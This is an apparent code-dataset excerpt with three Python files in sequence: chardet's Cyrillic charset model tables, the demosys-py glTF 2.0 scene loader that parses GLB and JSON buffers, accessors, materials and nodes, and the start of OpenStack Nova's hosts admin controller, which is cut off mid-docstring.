0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,0,2,3,2,2,2,1,2,2,2,1,2,1,0,0,1,1,1,0,2,0,1,1,1,0,0,1,1,
1,0,0,0,0,0,1,2,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,0,0,0,0,1,0,0,0,0,3,0,1,2,1,0,0,0,0,0,0,0,1,1,0,0,1,1,
1,0,1,0,1,2,0,0,1,1,2,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,
2,2,3,2,2,2,3,1,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,0,1,0,1,1,1,0,2,1,
1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0,
3,3,3,2,2,2,2,3,2,2,1,1,2,2,2,2,1,1,3,1,2,1,2,0,0,1,1,0,1,0,2,1,
1,1,1,1,1,2,1,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0,
2,0,0,1,0,3,2,2,2,2,1,2,1,2,1,2,0,0,0,2,1,2,2,1,1,2,2,0,1,1,0,2,
1,1,1,1,1,0,1,1,1,2,1,1,1,2,1,0,1,2,1,1,1,1,0,1,1,1,0,0,1,0,0,1,
1,3,2,2,2,1,1,1,2,3,0,0,0,0,2,0,2,2,1,0,0,0,0,0,0,1,0,0,0,0,1,1,
1,0,1,1,0,1,0,1,1,0,1,1,0,2,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,3,2,3,2,1,2,2,2,2,1,0,0,0,2,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,2,1,
1,1,2,1,0,2,0,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,
3,0,0,1,0,2,2,2,3,2,2,2,2,2,2,2,0,0,0,2,1,2,1,1,1,2,2,0,0,0,1,2,
1,1,1,1,1,0,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1,
2,3,2,3,3,2,0,1,1,1,0,0,1,0,2,0,1,1,3,1,0,0,0,0,0,0,0,1,0,0,2,1,
1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,
2,3,3,3,3,1,2,2,2,2,0,1,1,0,2,1,1,1,2,1,0,1,1,0,0,1,0,1,0,0,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,2,0,0,1,1,2,2,1,0,0,2,0,1,1,3,0,0,1,0,0,0,0,0,1,0,1,2,1,
1,1,2,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,
1,3,2,3,2,1,0,0,2,2,2,0,1,0,2,0,1,1,1,0,1,0,0,0,3,0,1,1,0,0,2,1,
1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,2,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0,
3,1,2,1,1,2,2,2,2,2,2,1,2,2,1,1,0,0,0,2,2,2,0,0,0,1,2,1,0,1,0,1,
2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,2,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1,
3,0,0,0,0,2,0,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1,
1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,
1,3,3,2,2,0,0,0,2,2,0,0,0,1,2,0,1,1,2,0,0,0,0,0,0,0,0,1,0,0,2,1,
0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
2,3,2,3,2,0,0,0,0,1,1,0,0,0,2,0,2,0,2,0,0,0,0,0,1,0,0,1,0,0,1,1,
1,1,2,0,1,2,1,0,1,1,2,1,1,1,1,1,2,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,
1,3,2,2,2,1,0,0,2,2,1,0,1,2,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,
0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,0,2,3,1,2,2,2,2,2,2,1,1,0,0,0,1,0,1,0,2,1,1,1,0,0,0,0,1,
1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
2,0,2,0,0,1,0,3,2,1,2,1,2,2,0,1,0,0,0,2,1,0,0,2,1,1,1,1,0,2,0,2,
2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1,
1,2,2,2,2,1,0,0,1,0,0,0,0,0,2,0,1,1,1,1,0,0,0,0,1,0,1,2,0,0,2,0,
1,0,1,1,1,2,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0,
2,1,2,2,2,0,3,0,1,1,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,
1,2,2,3,2,2,0,0,1,1,2,0,1,2,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,
0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,2,1,1,2,1,2,2,2,2,2,1,2,2,0,1,0,0,0,1,2,2,2,1,2,1,1,1,1,1,2,1,
1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,1,
1,2,2,2,2,0,1,0,2,2,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,
0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,2,2,2,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,
0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,0,1,0,0,1,1,2,0,0,0,0,1,0,1,0,0,1,0,0,2,0,0,0,1,
0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,1,1,2,0,2,1,1,1,1,0,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,2,1,2,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
1,0,0,0,0,2,0,1,2,1,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,
0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,
2,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,0,1,1,0,1,0,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0,
0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
)
Koi8rModel = {
'charToOrderMap': KOI8R_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "KOI8-R"
}
Win1251CyrillicModel = {
'charToOrderMap': win1251_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
Latin5CyrillicModel = {
'charToOrderMap': latin5_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
MacCyrillicModel = {
'charToOrderMap': macCyrillic_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "MacCyrillic"
}
Ibm866Model = {
'charToOrderMap': IBM866_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "IBM866"
}
Ibm855Model = {
'charToOrderMap': IBM855_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "IBM855"
}
# flake8: noqa
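# These model dicts are consumed by chardet's single-byte prober; a rough
# wiring sketch (from memory of chardet's sbcharsetprober module, so treat
# the import path as an assumption):
#     from .sbcharsetprober import SingleByteCharSetProber
#     prober = SingleByteCharSetProber(Win1251CyrillicModel)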
| gpl-3.0 |
Contraz/demosys-py | demosys/loaders/scene/gltf.py | 1 | 24715 | # Spec: https://github.com/KhronosGroup/glTF/blob/master/specification/2.0/README.md#asset
import base64
import io
import json
import os
import struct
from collections import namedtuple
import numpy
from PIL import Image
from pyrr import Matrix44, matrix44, quaternion
import moderngl
from demosys import context
from demosys.loaders.scene.base import SceneLoader
from demosys.loaders.texture import t2d
from demosys.opengl.vao import VAO
from demosys.resources.meta import SceneDescription, TextureDescription
from demosys.scene import Material, MaterialTexture, Mesh, Node, Scene
GLTF_MAGIC_HEADER = b'glTF'
# Texture wrap values
REPEAT = 10497
CLAMP_TO_EDGE = 33071
MIRRORED_REPEAT = 33648
# numpy dtype mapping
NP_COMPONENT_DTYPE = {
5121: numpy.uint8, # GL_UNSIGNED_BYTE
5123: numpy.uint16, # GL_UNSIGNED_SHORT
5125: numpy.uint32, # GL_UNSIGNED_INT
5126: numpy.float32, # GL_FLOAT
}
ComponentType = namedtuple('ComponentType', ['name', 'value', 'size'])
COMPONENT_TYPE = {
5120: ComponentType("BYTE", 5120, 1),
5121: ComponentType("UNSIGNED_BYTE", 5121, 1),
5122: ComponentType("SHORT", 5122, 2),
5123: ComponentType("UNSIGNED_SHORT", 5123, 2),
5125: ComponentType("UNSIGNED_INT", 5125, 4),
5126: ComponentType("FLOAT", 5126, 4),
}
# dtype to moderngl buffer format
DTYPE_BUFFER_TYPE = {
numpy.uint8: 'u1', # GL_UNSIGNED_BYTE
numpy.uint16: 'u2', # GL_UNSIGNED_SHORT
numpy.uint32: 'u4', # GL_UNSIGNED_INT
numpy.float32: 'f4', # GL_FLOAT
}
ACCESSOR_TYPE = {
"SCALAR": 1,
"VEC2": 2,
"VEC3": 3,
"VEC4": 4,
}
class GLTF2(SceneLoader):
"""
Loader for GLTF 2.0 files
"""
file_extensions = [
['.gltf'],
['.glb'],
]
supported_extensions = []
def __init__(self, meta: SceneDescription):
"""
Parse the json file and validate its contents.
No actual data loading will happen.
Supported formats:
- gltf json format with external resources
- gltf embedded buffers
- glb Binary format
"""
super().__init__(meta)
self.scenes = []
self.nodes = []
self.meshes = []
self.materials = []
self.images = []
self.samplers = []
self.textures = []
self.path = None
self.scene = None
    def load(self):
        """
        Deferred loading of the scene.
        :returns: The loaded ``Scene`` instance
        """
self.path = self.find_scene(self.meta.path)
if not self.path:
raise ValueError("Scene '{}' not found".format(self.meta.path))
self.scene = Scene(self.path)
# Load gltf json file
if self.path.suffix == '.gltf':
self.load_gltf()
# Load binary gltf file
if self.path.suffix == '.glb':
self.load_glb()
self.meta.check_version()
self.meta.check_extensions(self.supported_extensions)
self.load_images()
self.load_samplers()
self.load_textures()
self.load_materials()
self.load_meshes()
self.load_nodes()
self.scene.calc_scene_bbox()
self.scene.prepare()
return self.scene
def load_gltf(self):
"""Loads a gltf json file"""
with open(self.path) as fd:
self.meta = GLTFMeta(self.path, json.load(fd))
def load_glb(self):
"""Loads a binary gltf file"""
with open(self.path, 'rb') as fd:
# Check header
magic = fd.read(4)
if magic != GLTF_MAGIC_HEADER:
raise ValueError("{} has incorrect header {} != {}".format(self.path, magic, GLTF_MAGIC_HEADER))
version = struct.unpack('<I', fd.read(4))[0]
if version != 2:
raise ValueError("{} has unsupported version {}".format(self.path, version))
# Total file size including headers
_ = struct.unpack('<I', fd.read(4))[0] # noqa
# Chunk 0 - json
chunk_0_length = struct.unpack('<I', fd.read(4))[0]
chunk_0_type = fd.read(4)
if chunk_0_type != b'JSON':
raise ValueError("Expected JSON chunk, not {} in file {}".format(chunk_0_type, self.path))
json_meta = fd.read(chunk_0_length).decode()
# chunk 1 - binary buffer
chunk_1_length = struct.unpack('<I', fd.read(4))[0]
chunk_1_type = fd.read(4)
if chunk_1_type != b'BIN\x00':
raise ValueError("Expected BIN chunk, not {} in file {}".format(chunk_1_type, self.path))
self.meta = GLTFMeta(self.path, json.loads(json_meta), binary_buffer=fd.read(chunk_1_length))
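    # GLB container layout parsed above, for reference (per the glTF 2.0 spec):
    #   byte  0  uint32  magic, must equal b'glTF'
    #   byte  4  uint32  version, must equal 2
    #   byte  8  uint32  total file length
    #   byte 12  uint32  chunk 0 length
    #   byte 16  4 bytes chunk 0 type, b'JSON'
    #   byte 20  ...     chunk 0 data, followed by an optional BIN chunk
    #                    framed the same way (length, type b'BIN\x00', data)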
def load_images(self):
for image in self.meta.images:
self.images.append(image.load(self.path.parent))
def load_samplers(self):
for sampler in self.meta.samplers:
# NOTE: Texture wrap will be changed in moderngl 6.x
# We currently only have repeat values
self.samplers.append(
self.ctx.sampler(
filter=(sampler.minFilter, sampler.magFilter),
repeat_x=sampler.wrapS in [REPEAT, MIRRORED_REPEAT],
repeat_y=sampler.wrapT in [REPEAT, MIRRORED_REPEAT],
anisotropy=16.0,
)
)
def load_textures(self):
for texture_meta in self.meta.textures:
texture = MaterialTexture()
if texture_meta.source is not None:
texture.texture = self.images[texture_meta.source]
if texture_meta.sampler is not None:
texture.sampler = self.samplers[texture_meta.sampler]
self.textures.append(texture)
def load_meshes(self):
for meta_mesh in self.meta.meshes:
# Returns a list of meshes
meshes = meta_mesh.load(self.materials)
self.meshes.append(meshes)
for mesh in meshes:
self.scene.meshes.append(mesh)
def load_materials(self):
# Create material objects
for meta_mat in self.meta.materials:
mat = Material(meta_mat.name)
mat.color = meta_mat.baseColorFactor
mat.double_sided = meta_mat.doubleSided
if meta_mat.baseColorTexture is not None:
mat.mat_texture = self.textures[meta_mat.baseColorTexture['index']]
self.materials.append(mat)
self.scene.materials.append(mat)
def load_nodes(self):
# Start with root nodes in the scene
for node_id in self.meta.scenes[0].nodes:
node = self.load_node(self.meta.nodes[node_id])
self.scene.root_nodes.append(node)
def load_node(self, meta, parent=None):
# Create the node
node = Node()
self.scene.nodes.append(node)
if meta.matrix is not None:
node.matrix = Matrix44(value=meta.matrix)
if meta.mesh is not None:
# Since we split up meshes with multiple primitives, this can be a list
# If only one mesh we set it on the node as normal
if len(self.meshes[meta.mesh]) == 1:
node.mesh = self.meshes[meta.mesh][0]
# If multiple meshes we add them as new child node
elif len(self.meshes[meta.mesh]) > 1:
for mesh in self.meshes[meta.mesh]:
node.add_child(Node(mesh=mesh))
if meta.camera is not None:
# FIXME: Use a proper camera class
node.camera = self.meta.cameras[meta.camera]
if parent:
parent.add_child(node)
# Follow children
if meta.has_children:
for node_id in meta.children:
self.load_node(self.meta.nodes[node_id], parent=node)
return node
class GLTFMeta:
"""Container for gltf metadata"""
def __init__(self, path, data, binary_buffer=None):
"""
:param file: GLTF file name loaded
:param data: Metadata (json loaded)
:param binary_buffer: Binary buffer when loading glb files
"""
self.data = data
self.path = path
self.asset = GLTFAsset(data['asset'])
self.materials = [GLTFMaterial(m) for m in data['materials']] if data.get('materials') else []
self.images = [GLTFImage(i) for i in data['images']] if data.get('images') else []
self.samplers = [GLTFSampler(s) for s in data['samplers']] if data.get('samplers') else []
self.textures = [GLTFTexture(t) for t in data['textures']] if data.get('textures') else []
self.scenes = [GLTFScene(s) for s in data['scenes']] if data.get('scenes') else []
self.nodes = [GLTFNode(n) for n in data['nodes']] if data.get('nodes') else []
self.meshes = [GLTFMesh(m) for m in data['meshes']] if data.get('meshes') else []
self.cameras = [GLTFCamera(c) for c in data['cameras']] if data.get('cameras') else []
self.buffer_views = [GLTFBufferView(i, v) for i, v in enumerate(data['bufferViews'])] \
if data.get('bufferViews') else []
self.buffers = [GLTFBuffer(i, b, self.path.parent) for i, b in enumerate(data['buffers'])] \
if data.get('buffers') else []
self.accessors = [GLTFAccessor(i, a) for i, a in enumerate(data['accessors'])] \
if data.get('accessors') else []
# glb files can contain buffer 0 data
if binary_buffer:
self.buffers[0].data = binary_buffer
self._link_data()
self.buffers_exist()
self.images_exist()
def _link_data(self):
"""Add references"""
# accessors -> buffer_views -> buffers
for acc in self.accessors:
acc.bufferView = self.buffer_views[acc.bufferViewId]
for buffer_view in self.buffer_views:
buffer_view.buffer = self.buffers[buffer_view.bufferId]
# Link accessors to mesh primitives
for mesh in self.meshes:
for primitive in mesh.primitives:
if getattr(primitive, "indices", None) is not None:
primitive.indices = self.accessors[primitive.indices]
for name, value in primitive.attributes.items():
primitive.attributes[name] = self.accessors[value]
# Link buffer views to images
for image in self.images:
if image.bufferViewId is not None:
image.bufferView = self.buffer_views[image.bufferViewId]
@property
def version(self):
return self.asset.version
def check_version(self, required='2.0'):
if not self.version == required:
msg = "GLTF Format version is not 2.0. Version states '{}' in file {}".format(
self.version,
self.path,
)
raise ValueError(msg)
def check_extensions(self, supported):
"""
"extensionsRequired": ["KHR_draco_mesh_compression"],
"extensionsUsed": ["KHR_draco_mesh_compression"]
"""
if self.data.get('extensionsRequired'):
for ext in self.data.get('extensionsRequired'):
if ext not in supported:
raise ValueError("Extension {} not supported".format(ext))
if self.data.get('extensionsUsed'):
for ext in self.data.get('extensionsUsed'):
if ext not in supported:
raise ValueError("Extension {} not supported".format(ext))
def buffers_exist(self):
"""Checks if the bin files referenced exist"""
for buff in self.buffers:
if not buff.is_separate_file:
continue
path = self.path.parent / buff.uri
if not os.path.exists(path):
raise FileNotFoundError("Buffer {} referenced in {} not found".format(path, self.path))
def images_exist(self):
"""checks if the images references in textures exist"""
pass
class GLTFAsset:
"""Asset Information"""
def __init__(self, data):
self.version = data.get('version')
self.generator = data.get('generator')
self.copyright = data.get('copyright')
class GLTFMesh:
def __init__(self, data):
class Primitives:
def __init__(self, data):
self.attributes = data.get('attributes')
self.indices = data.get('indices')
self.mode = data.get('mode')
self.material = data.get('material')
self.name = data.get('name')
self.primitives = [Primitives(p) for p in data.get('primitives')]
def load(self, materials):
name_map = {
'POSITION': 'in_position',
'NORMAL': 'in_normal',
'TEXCOORD_0': 'in_uv',
'TANGENT': 'in_tangent',
'JOINTS_0': 'in_joints',
            'WEIGHTS_0': 'in_weights',
'COLOR_0': 'in_color0',
}
meshes = []
# Read all primitives as separate meshes for now
# According to the spec they can have different materials and vertex format
for primitive in self.primitives:
vao = VAO(self.name, mode=primitive.mode or moderngl.TRIANGLES)
# Index buffer
component_type, index_vbo = self.load_indices(primitive)
if index_vbo is not None:
vao.index_buffer(context.ctx().buffer(index_vbo.tobytes()),
index_element_size=component_type.size)
attributes = {}
vbos = self.prepare_attrib_mapping(primitive)
for vbo_info in vbos:
dtype, buffer = vbo_info.create()
vao.buffer(
buffer,
" ".join(["{}{}".format(attr[1], DTYPE_BUFFER_TYPE[dtype]) for attr in vbo_info.attributes]),
[name_map[attr[0]] for attr in vbo_info.attributes],
)
for attr in vbo_info.attributes:
attributes[attr[0]] = {
'name': name_map[attr[0]],
'components': attr[1],
'type': vbo_info.component_type.value,
}
bbox_min, bbox_max = self.get_bbox(primitive)
meshes.append(Mesh(
self.name, vao=vao, attributes=attributes,
material=materials[primitive.material] if primitive.material is not None else None,
bbox_min=bbox_min, bbox_max=bbox_max,
))
return meshes
def load_indices(self, primitive):
"""Loads the index buffer / polygon list for a primitive"""
if getattr(primitive, "indices") is None:
return None, None
_, component_type, buffer = primitive.indices.read()
return component_type, buffer
def prepare_attrib_mapping(self, primitive):
"""Pre-parse buffer mappings for each VBO to detect interleaved data for a primitive"""
buffer_info = []
for name, accessor in primitive.attributes.items():
info = VBOInfo(*accessor.info())
info.attributes.append((name, info.components))
if buffer_info and buffer_info[-1].buffer_view == info.buffer_view:
if buffer_info[-1].interleaves(info):
buffer_info[-1].merge(info)
continue
buffer_info.append(info)
return buffer_info
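    # Example of the merge above (values hypothetical): POSITION (vec3 float,
    # 12 bytes per vertex) at byte offset 0 and NORMAL (vec3 float) at byte
    # offset 12 in the same buffer view collapse into one interleaved VBO
    # declared as "3f4 3f4" -> ['in_position', 'in_normal'].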
def get_bbox(self, primitive):
"""Get the bounding box for the mesh"""
accessor = primitive.attributes.get('POSITION')
return accessor.min, accessor.max
class VBOInfo:
"""Resolved data about each VBO"""
def __init__(self, buffer=None, buffer_view=None,
byte_length=None, byte_offset=None,
component_type=None, components=None, count=None):
self.buffer = buffer # reference to the buffer
self.buffer_view = buffer_view
self.byte_length = byte_length # Raw byte buffer length
self.byte_offset = byte_offset # Raw byte offset
self.component_type = component_type # Datatype of each component
self.components = components
self.count = count # number of elements of the component type size
# list of (name, components) tuples
self.attributes = []
def interleaves(self, info):
"""Does the buffer interleave with this one?"""
return info.byte_offset == self.component_type.size * self.components
def merge(self, info):
# NOTE: byte length is the same
self.components += info.components
self.attributes += info.attributes
def create(self):
"""Create the VBO"""
dtype = NP_COMPONENT_DTYPE[self.component_type.value]
data = numpy.frombuffer(
self.buffer.read(byte_length=self.byte_length, byte_offset=self.byte_offset),
count=self.count * self.components,
dtype=dtype,
)
return dtype, data
def __str__(self):
return "VBOInfo<buffer={}, buffer_view={},\n" \
" length={}, offset={}, \n" \
" component_type={}, components={}, count={}, \n" \
" attribs={}".format(self.buffer.id, self.buffer_view.id, self.target,
self.byte_length, self.byte_offset,
self.component_type.value, self.components, self.count,
self.attributes)
def __repr__(self):
return str(self)
class GLTFAccessor:
def __init__(self, accessor_id, data):
self.id = accessor_id
self.bufferViewId = data.get('bufferView') or 0
self.bufferView = None
self.byteOffset = data.get('byteOffset') or 0
self.componentType = COMPONENT_TYPE[data['componentType']]
self.count = data.get('count')
self.min = numpy.array(data.get('min') or [-0.5, -0.5, -0.5], dtype=numpy.float32)
self.max = numpy.array(data.get('max') or [0.5, 0.5, 0.5], dtype=numpy.float32)
self.type = data.get('type')
def read(self):
"""
Reads buffer data
:return: component count, component type, data
"""
# ComponentType helps us determine the datatype
dtype = NP_COMPONENT_DTYPE[self.componentType.value]
return ACCESSOR_TYPE[self.type], self.componentType, self.bufferView.read(
byte_offset=self.byteOffset,
dtype=dtype,
count=self.count * ACCESSOR_TYPE[self.type],
)
def info(self):
"""
Get underlying buffer info for this accessor
:return: buffer, byte_length, byte_offset, component_type, count
"""
buffer, byte_length, byte_offset = self.bufferView.info(byte_offset=self.byteOffset)
return buffer, self.bufferView, \
byte_length, byte_offset, \
self.componentType, ACCESSOR_TYPE[self.type], self.count
class GLTFBufferView:
def __init__(self, view_id, data):
self.id = view_id
self.bufferId = data.get('buffer')
self.buffer = None
self.byteOffset = data.get('byteOffset') or 0
self.byteLength = data.get('byteLength')
self.byteStride = data.get('byteStride') or 0
# Valid: 34962 (ARRAY_BUFFER) and 34963 (ELEMENT_ARRAY_BUFFER) or None
def read(self, byte_offset=0, dtype=None, count=0):
data = self.buffer.read(
byte_offset=byte_offset + self.byteOffset,
byte_length=self.byteLength,
)
vbo = numpy.frombuffer(data, count=count, dtype=dtype)
return vbo
def read_raw(self):
return self.buffer.read(byte_length=self.byteLength, byte_offset=self.byteOffset)
def info(self, byte_offset=0):
"""
Get the underlying buffer info
:param byte_offset: byte offset from accessor
:return: buffer, byte_length, byte_offset
"""
return self.buffer, self.byteLength, byte_offset + self.byteOffset
class GLTFBuffer:
def __init__(self, buffer_id, data, path):
self.id = buffer_id
self.path = path
self.byteLength = data.get('byteLength')
self.uri = data.get('uri')
self.data = None
@property
def has_data_uri(self):
"""Is data embedded in json?"""
if not self.uri:
return False
return self.uri.startswith("data:")
@property
def is_separate_file(self):
"""Buffer represents an independent bin file?"""
return self.uri is not None and not self.has_data_uri
def open(self):
if self.data:
return
if self.has_data_uri:
self.data = base64.b64decode(self.uri[self.uri.find(',') + 1:])
return
with open(self.path / self.uri, 'rb') as fd:
self.data = fd.read()
def read(self, byte_offset=0, byte_length=0):
self.open()
return self.data[byte_offset:byte_offset + byte_length]
class GLTFScene:
def __init__(self, data):
self.nodes = data['nodes']
class GLTFNode:
def __init__(self, data):
self.children = data.get('children')
self.matrix = data.get('matrix')
self.mesh = data.get('mesh')
self.camera = data.get('camera')
self.translation = data.get('translation')
self.rotation = data.get('rotation')
self.scale = data.get('scale')
if self.matrix is None:
self.matrix = matrix44.create_identity()
if self.translation is not None:
self.matrix = matrix44.create_from_translation(self.translation)
if self.rotation is not None:
quat = quaternion.create(self.rotation[0], self.rotation[1], self.rotation[2], self.rotation[3])
mat = matrix44.create_from_quaternion(quat)
self.matrix = matrix44.multiply(mat, self.matrix)
if self.scale is not None:
self.matrix = matrix44.multiply(matrix44.create_from_scale(self.scale), self.matrix)
@property
def has_children(self):
return self.children is not None and len(self.children) > 0
@property
def is_resource_node(self):
"""Is this just a reference node to a resource?"""
return self.camera is not None or self.mesh is not None
class GLTFMaterial:
def __init__(self, data):
self.name = data.get('name')
        # Defaults to true here when not defined (note: the glTF spec default
        # is false); get() with a default keeps an explicit false intact
        self.doubleSided = data.get('doubleSided', True)
pbr = data['pbrMetallicRoughness']
self.baseColorFactor = pbr.get('baseColorFactor')
self.baseColorTexture = pbr.get('baseColorTexture')
self.metallicFactor = pbr.get('metallicFactor')
self.emissiveFactor = data.get('emissiveFactor')
class GLTFImage:
"""
Represent texture data.
May be a file, embedded data or pointer to data in bufferview
"""
def __init__(self, data):
self.uri = data.get('uri')
self.bufferViewId = data.get('bufferView')
self.bufferView = None
self.mimeType = data.get('mimeType')
def load(self, path):
# data:image/png;base64,iVBOR
# Image is stored in bufferView
if self.bufferView is not None:
image = Image.open(io.BytesIO(self.bufferView.read_raw()))
# Image is embedded
elif self.uri and self.uri.startswith('data:'):
data = self.uri[self.uri.find(',') + 1:]
image = Image.open(io.BytesIO(base64.b64decode(data)))
else:
path = path / self.uri
print("Loading:", self.uri)
image = Image.open(path)
texture = t2d.Loader(TextureDescription(
label="gltf",
image=image,
flip=False,
mipmap=True,
)).load()
return texture
class GLTFTexture:
def __init__(self, data):
self.sampler = data.get('sampler')
self.source = data.get('source')
class GLTFSampler:
def __init__(self, data):
self.magFilter = data.get('magFilter')
self.minFilter = data.get('minFilter')
self.wrapS = data.get('wrapS')
self.wrapT = data.get('wrapT')
class GLTFCamera:
def __init__(self, data):
self.data = data
# "perspective": {
# "aspectRatio": 1.0,
# "yfov": 0.266482561826706,
# "zfar": 1000000.0,
# "znear": 0.04999999701976776
# },
# "type": "perspective"
| isc |
tanglei528/nova | nova/api/openstack/compute/plugins/v3/hosts.py | 13 | 13924 | # Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hosts admin extension."""
import webob.exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
ALIAS = 'os-hosts'
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
class HostController(wsgi.Controller):
"""The Hosts API controller for the OpenStack API."""
def __init__(self):
self.api = compute.HostAPI()
super(HostController, self).__init__()
@extensions.expected_errors(())
def index(self, req):
""":returns: A dict in the format:
{'hosts': [{'host_name': 'some.host.name',
'service': 'cells',
'zone': 'internal'},
{'host_name': 'some.other.host.name',
'service': 'cells',
'zone': 'internal'},
{'host_name': 'some.celly.host.name',
'service': 'cells',
'zone': 'internal'},
{'host_name': 'console1.host.com',
